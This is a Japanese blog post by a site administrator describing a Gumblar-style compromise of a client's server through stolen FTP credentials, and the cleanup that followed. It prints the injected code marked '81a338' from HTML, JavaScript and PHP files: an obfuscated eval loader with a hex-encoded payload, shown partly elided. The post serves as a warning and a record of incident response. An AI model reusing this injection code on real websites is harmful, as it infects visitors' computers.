WEBサイト改ざん被害

メルです。

かなり仕事を休んでしまったので
「さぁ、仕事!仕事!」と思いきや、
管理しているある企業のサーバーに
不振なFTPアクセスが・・・

アクセス元は、

など・・・。

これはやばいのでは?と思いながら
サーバーの中身を見ると、
なんと大量のファイルが改ざんにあっているではありませんか。

改竄されたページにアクセスすると訪問者のパソコンが
感染し、被害が広まると言うオマケ付き。

改竄されたファイルは、HTMLファイル、JavaScriptファイル、
一部PHPファイルで、<!–81a338–>、/*81a338*/から始まる
JavaScript、iframe などの埋め込みが特徴。

他にも81a338の代わりに0c0896や、ded509などの6桁の
英数字のものもあるようです。

状況から見て、
これは最近非常に被害が増えているパターンで
ガンブラーなどのウイルスやスパイウエアに感染し、
パソコンからFTP情報を搾取され、改竄されている
可能性が高い。

 

 

流石にこれはまずいので、
サイトを閉鎖し、クライアント企業に連絡。

全てのパソコンのウイルスチェックをしてもらい、
サーバー、FTPへのアクセス制限を行い、
全てのパスワードの変更と共に復旧作業に取り掛かることに。

因みに改ざん被害にあったファイルには以下のコードが追加されていました。

 

改ざんされたHTMLファイル

<!--81a338--><script type="text/javascript" language="javascript" >gakqf="s"+"p"+"li"+"t";srkjb=window;fpr="dy";txm=document;rcigwm="0x";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv="17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:58:5c:17:34:17:5b:66:5a:6c
     ・
     ・中略
     ・
5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:58:5c:27:30:1f:20:32:4:1:74:4:1:74"[gakqf](":");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String["fromCharCode"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script><!--/81a338-->

 

改ざんされたJavaScriptファイル

/*81a338*/
ragir="s"+"p"+"li"+"t";negu=window;zwh="dy";vqpoo=document;rauffm="0x";blye=(5-3-1);try{++(vqpoo.body)}catch(xdomas){jioz=false;try{}catch(dhncm){jioz=21;}
if(1){przkl="17:5d:6c:65:5a:6b:60:66:65:17:60:5d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:
     ・
     ・中略
     ・
2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:5d:27:30:1f:20:32:4:1:74:4:1:74"[ragir](":");}negu=przkl;ljy=[];for(cahkv=22-20-2;-cahkv+1374!=0;cahkv+=1){lufim=cahkv;if((0x19==031))ljy+=String["fromCharCode"](eval(rauffm+negu[1*lufim])+0xa-blye);}klc=eval;klc(ljy)}
/*/81a338*/

 

改ざんされたPHPファイル

#81a338#
if(empty($qk)) {
$qk = "<script type=\"text/javascript\" language=\"javascript\" >gakqf=\"s\"+\"p\"+\"li\"+\"t\";srkjb=window;fpr=\"dy\";txm=document;rcigwm=\"0x\";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv=\"17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:
     ・
     ・中略
     ・
4:1:74:4:1:74\"[gakqf](\":\");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String[\"fromCharCode\"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script>";
echo $qk;
}
#/81a338#

 

このサーバーには月商300万円のネットショップが入っていたので
スピード勝負。

結局なんだかんだで復旧までに丸1日かかってしまいましたが(笑

最近、CMSなどの脆弱性をついた攻撃や、
今回のようにパソコンから情報を搾取しての攻撃など、
非常に被害が広まっています。

またWEBサイトにアクセスするだけでも感染するものも
多数あります。

どこか遠い世界の出来事ではなく、
誰もがいつでも感染する可能性があります。

パソコンのセキュリティはしっかりと導入し、
まめにスキャンして、皆さんも気をつけて下さい。

 

 

— 10/3追記 —

 

このタイプの被害にあった場合の対処法は、
81a338で入れ子になっている部分の記述を削除するしかありません。

被害にあっている事に気付くのが遅いと、
数百から数千ものファイルが書き換えられているため、
手動でファイルを開いて削除していたら大変です。
日頃からサーバー内の全ファイルのバックアップを
まめに取っておく事をお勧めします。

バックアップさえあれば、FTPで一括上書きアップロードで対応できます。

 

 

この投稿は役に立ちましたか? 役に立った 役に立たなかった

 

ネットビジネス速報メールマガジン

 

メルのネットビジネス速報では、悪質高額塾などの被害が拡大しないように
新しい悪質販売者の情報が入り次第、速報でお伝えいたします。

Dreamweaver、Fireworks、PhotoshopなどのTipsやチュートリアルの紹介、
最新SEO情報、その他ネットビジネスに関する情報をいち早く配信しています。

お名前(必須)
メールアドレス(必須)

One Response to “WEBサイト改ざん被害”

  1. […] これは前回、WEBサイト改ざん被害の記事でも書きかましたが、 管理しているパソコンからFTPのパスワードを抜き取られて改竄されます。 […]

記事「WEBサイト改ざん被害」にコメントを残す

*

サブコンテンツ

危険な高額塾

タグ

Line XHTML 自動 不正アクセス 加工 フォローマティック グラデーション 賢威 テーマ ネットゲーム ヤフー 管理ツール シャンプー 蝶乃舞 音量アイコン 日本語入力変換ソフト カスタマイズ 与沢翼 Extension Manager ウインドウ ツール もざ 山下 Wordpress Content Slide 高速ゲーム 管理画面 アレックス式ネオせどりスクール getElementByTagName ファビコン Tiger-Wing 個人情報 原田真 百度 立体 やしろひろたみ CS6 office ライン 定型文 Thunderbird DTD ムーバブルタイプ 株式会社SRシステム SmoothScroll.js ブラクラ スムーズ ブロック HTML4.0 PHP 比較 ネットビジネス ソフト クロスアフィリエイト 切り抜き バックアップ wp-login.php MasterCollection 滑らか 改竄 android 無料オファー 池田純矢 Adobe 伊藤 虎太郎 せどり 自己アフィリエイト トラフィック ハート YouTube Maniax 2017 テンプレート トレンドアフィリエイト インターネット Youtube ECサイト 表示 株式会社Free Agent Style MT アレックス ぼかし ネットガレージ ソース インペリアルゴールド デスクトップ 加藤 秀吉 不正送信 流出 Windows 切抜き 大西良幸 パズル プラグイン PPC Diamond Affiliate Masters Program 情報商材 getElementById 高額塾 Windows 7 関根塾 与沢翼×蝶乃舞 インターネットビジネススクール 株式会社WINGOOD インターネットエクスプローラー 三橋美仁 CGI Newpost Catch ブラウザ 自己アフィリ ライオンアフィリエイト フレンドシップメール Chrome WEB エクスチェンジ ヤフオク 大園転売塾 ヤフーショッピング 株式会社ニュース 脆弱性 CS5 放射線 背景 IBS エディタ FireWorks 上位表示 twitter Internet Explorer 伊藤 歩 伊藤塾 プロファイル @PAGES バイマ 短縮URLツール クラウド変換 レイアウト崩れ SKナレッジ クラック ping 固定ページ 中山秀人 Cash on Wordpress 無料 SEO SyntaxHighlighter 到達率 マイクロソフト KMSpico document.all レタープレス メルマガ配信システム バナー 久積篤史 球体 Firefox ドメイン followmatic Yahoo ブロックポリシー Login LockDown WP アクセス制限 小笠原健一 ping送信 特定のメールアドレス ランキング 申請金ビジネス スマホ explorer レンタルサーバー やしろ塾 RSS 出店料 不労所得の神 Agency Business wpXサーバー ツイッター サイト改ざん MovableTYpe ブラシ KMS認証 DOCTYPE ネオヒルズアカデミー ウイルス Favicon 掲示板 登録禁止 postpost アイコン レイアウト Google Maps API タスクバー アフィ匠 FTP セキュリティ アドセンス ブルートフォースアタック IE .htaccess 81a338 メモ IP クリックランキング 伊藤虎太郎 html 土屋ひろし 転売大園塾 コピーボタン エキスパートメール がら空きビジネス 詐欺組織 ビジネス レビュー 副業術 Google Maps プロモーション ネットショップ ワードプレス 株式会社SRシステム css アクセスアップ 権利収入 エクスプローラー 株式会社A-ブログレス iphone ざくざく君 リンクシェイカー マニュアル 関根義光 ネットビジネス最後の楽園 アンダーグラウンドアフィリエイトクラブ スタイルシート 短縮URL アフィリエイト EC Baidu 自動化 RMT バイドゥー 村上省吾 High Concept Marketing 画像 スクロール system 優先順位 functions.php 宮田麗花 人物 tool LinkShaker RSS Includes Pages クラウド入力機能 google 北川 雅嗣 個人情報流出 量産 インフォトップ 石井匠 株式会社バンザイ サンタ 復元 ソースコード 大園麗花 Ban Hammer マルウエア スカイプ 新井浩 BBIZ ネットビジネス大全集 アンダーグラウンドメソッド ボタン タイガーウイング 配布 force puzzle 秒速で1億円稼ぐ男 モザイク 改ざん moza トレンドキーワード 感染 無断送信 JavaScript wordpress 詐欺 ロリポップ 特権ビジネス ライブチャット ユーチューブマニアクス2017 BUYMA 既得権益 大園式転売塾 秀吉塾天下統一

アーカイブ

エステトラブル

このページの先頭へ